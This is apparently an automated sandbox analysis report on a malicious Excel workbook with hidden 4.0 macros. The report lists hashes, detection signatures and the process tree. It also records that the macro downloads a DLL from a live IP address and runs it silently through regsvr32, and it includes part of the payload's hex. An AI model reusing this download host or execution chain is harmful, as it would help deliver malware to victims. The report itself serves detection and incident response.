Play interactive tour

Edit tour

Analysis Report Total_order_data-V2434883.xlsb

Overview

General Information

Sample Name:	Total_order_data-V2434883.xlsb
Analysis ID:	432263
MD5:	3ee5986d7978a5f2df982fce2a3ebf93
SHA1:	8f0e54b80cb391871d3cd1de6dd190ea686f0798
SHA256:	a0a165ea7db4685fb5677e3bc17c6d9ade7224dca824d9de930355f1c40ee0a2
Infos:
Most interesting Screenshot:

Detection

Hidden Macro 4.0

Score:	80
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Document exploit detected (creates forbidden files)

Document exploit detected (drops PE files)

Document exploit detected (UrlDownloadToFile)

Document exploit detected (process start blacklist hit)

Drops PE files to the user root directory

Found Excel 4.0 Macro with suspicious formulas

Office process drops PE file

Sigma detected: Microsoft Office Product Spawning Windows Shell

Abnormal high CPU Usage

Antivirus or Machine Learning detection for unpacked file

Contains functionality to read the PEB

Creates a process in suspended mode (likely to inject code)

Downloads executable code via HTTP

Drops PE files

Drops PE files to the user directory

Found dropped PE file which has not been started or loaded

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Registers a DLL

Tries to load missing DLLs

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Xls With Macro 4.0

Classification

Process Tree

System is w10x64

EXCEL.EXE (PID: 3292 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)

regsvr32.exe (PID: 5852 cmdline: regsvr32 -s ..\kdldyeff.dll MD5: 426E7499F6A7346F0410DEAD0805586B)

cmd.exe (PID: 5964 cmdline: C:\Windows\system32\cmd.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source	Rule	Description	Author	Strings
app.xml	JoeSecurity_XlsWithMacro4	Yara detected Xls With Macro 4.0	Joe Security

Sigma Overview

System Summary:

Sigma detected: Microsoft Office Product Spawning Windows Shell

Show sources

Source: Process started

Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: regsvr32 -s ..\kdldyeff.dll, CommandLine: regsvr32 -s ..\kdldyeff.dll, CommandLine|base64offset|contains: ,, Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 3292, ProcessCommandLine: regsvr32 -s ..\kdldyeff.dll, ProcessId: 5852

Signature Overview

Click to jump to signature section

Show All Signature Results

Source: 2.2.regsvr32.exe.970000.2.unpack	Avira: Label: TR/Dropper.Gen
Source: 2.2.regsvr32.exe.8340f0.1.unpack	Avira: Label: TR/Patched.Ren.Gen

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File opened: C:\Windows\SysWOW64\MSVCR100.dll

Software Vulnerabilities:

Document exploit detected (creates forbidden files)

Show sources

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\sat1_0609_2[1].dll			Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\user\kdldyeff.dll			Jump to behavior

Document exploit detected (drops PE files)

Show sources

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: sat1_0609_2[1].dll.0.dr

Jump to dropped file

Document exploit detected (UrlDownloadToFile)

Show sources

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Section loaded: unknown origin: URLDownloadToFileA

Document exploit detected (process start blacklist hit)

Show sources

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Process created: C:\Windows\SysWOW64\regsvr32.exe

Source: global traffic

TCP traffic: 192.168.2.3:49719 -> 185.180.199.121:80

Source: global traffic

TCP traffic: 192.168.2.3:49719 -> 185.180.199.121:80

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 09 Jun 2021 21:54:41 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.3.28Last-Modified: Wed, 09 Jun 2021 20:56:10 GMTETag: "803e0-5c45b81110e80"Accept-Ranges: bytesContent-Length: 525280Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 de a0 b9 12 9a c1 d7 41 9a c1 d7 41 9a c1 d7 41 cc de c4 41 bf c1 d7 41 9a c1 d7 41 a2 c1 d7 41 f8 de c4 41 89 c1 d7 41 9a c1 d6 41 53 c0 d7 41 19 dd d9 41 81 c1 d7 41 72 de dd 41 16 c1 d7 41 22 c7 d1 41 9b c1 d7 41 72 de dc 41 c7 c1 d7 41 72 de d3 41 9b c1 d7 41 52 69 63 68 9a c1 d7 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 93 84 74 60 00 00 00 00 00 00 00 00 e0 00 0e 21 0b 01 06 00 00 40 02 00 00 d0 05 00 00 00 00 00 d9 bd 00 00 00 10 00 00 00 50 02 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 08 00 00 10 00 00 64 dd 08 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 60 db 02 00 55 00 00 00 b8 c0 02 00 f0 00 00 00 00 50 03 00 b8 69 04 00 00 00 00 00 00 00 00 00 00 e0 07 00 e0 23 00 00 00 c0 07 00 b8 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 02 00 14 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a7 37 02 00 00 10 00 00 00 40 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 b5 8b 00 00 00 50 02 00 00 90 00 00 00 50 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 e8 63 00 00 00 e0 02 00 00 30 00 00 00 e0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b8 69 04 00 00 50 03 00 00 70 04 00 00 10 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d2 5f 00 00 00 c0 07 00 00 60 00 00 00 80 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: global traffic

HTTP traffic detected: GET /sat1_0609_2.dll HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.180.199.121Connection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121

Source: global traffic

Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://ocsp.comodoca.com0
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0O
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://ocsp.sectigo.com0
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://analysis.windows.net/powerbi/api
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://api.aadrm.com/
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://api.addins.store.office.com/app/query
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://api.cortana.ai
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://api.diagnostics.office.com
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://api.diagnosticssdf.office.com
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://api.microsoftstream.com/api/
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://api.office.net
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://api.onedrive.com
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://apis.live.net/v5.0/
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://arc.msn.com/v4/api/selection
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://augloop.office.com
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://augloop.office.com/v2
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://autodiscover-s.outlook.com/
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://cdn.entity.
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://clients.config.office.net/
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://config.edge.skype.com
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://cortana.ai
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://cortana.ai/api
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://cr.office.com
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://dataservice.o365filtering.com
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://dataservice.o365filtering.com/
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://dev.cortana.ai
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://devnull.onenote.com
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://directory.services.
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://ecs.office.com/config/v2/Office
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://entitlement.diagnostics.office.com
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://globaldisco.crm.dynamics.com
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://graph.ppe.windows.net
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://graph.ppe.windows.net/
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://graph.windows.net
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://graph.windows.net/
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://incidents.diagnostics.office.com
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://lifecycle.office.com
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://login.microsoftonline.com/
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://login.windows.local
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://management.azure.com
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://management.azure.com/
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://messaging.office.com/
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://ncus.contentsync.
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://ncus.pagecontentsync.
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://officeapps.live.com
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://officeci.azurewebsites.net/api/
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://onedrive.live.com
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://onedrive.live.com/embed?
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://outlook.office.com/
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://outlook.office365.com/
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
